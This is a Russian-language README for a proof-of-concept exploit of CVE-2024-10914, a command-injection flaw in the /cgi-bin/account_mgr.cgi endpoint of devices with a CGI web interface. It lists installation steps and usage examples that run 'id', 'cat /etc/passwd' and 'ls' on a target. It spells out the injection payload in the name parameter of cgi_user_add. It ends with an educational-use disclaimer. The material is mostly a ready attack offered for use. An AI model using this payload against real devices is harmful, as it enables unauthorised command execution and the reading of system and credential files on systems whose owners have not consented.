
PoC для эксплуатации CVE-2024-10914
Эксплойт для уязвимости внедрения команд в конечной точке /cgi-bin/account_mgr.cgi. Эта уязвимость позволяет выполнять произвольные команды в затронутой системе через несанитизированные параметры.
CVE-2024-10914 — это уязвимость внедрения команд, которая затрагивает устройства с веб-интерфейсом CGI. Уязвимое приложение не проверяет должным образом параметр name в запросе cgi_user_add, позволяя злоумышленнику внедрять системные команды, которые будут выполняться с привилегиями приложения.
Клонируйте репозиторий и установите зависимости:
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt
Или установите вручную:
pip install requests
Скрипт принимает два аргумента:
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <КОМАНДА>
-u, --url (обязательно): URL цели (пример: http://192.168.1.1)-c, --command (опционально): Выполняемая команда (по умолчанию: id)Выполнить команду id:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1
Выполнить пользовательскую команду:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"
Вывести список файлов:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"
Эксплойт отправляет GET-запрос к уязвимой конечной точке со следующим payload:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <КОМАНДА>; "
Пустая строка закрывается кавычками, и внедряется нужная команда, которая выполняется в контексте сервера.
Скрипт покажет:
Данный код предоставляется исключительно в образовательных целях и для исследований безопасности. Он должен быть использован только в системах, на которые у вас есть явное разрешение. Несанкционированное использование этого эксплойта может нарушить местные законы и являться уголовным преступлением. Автор не несёт ответственности за ненадлежащее использование этого инструмента.
SS3K
Не указана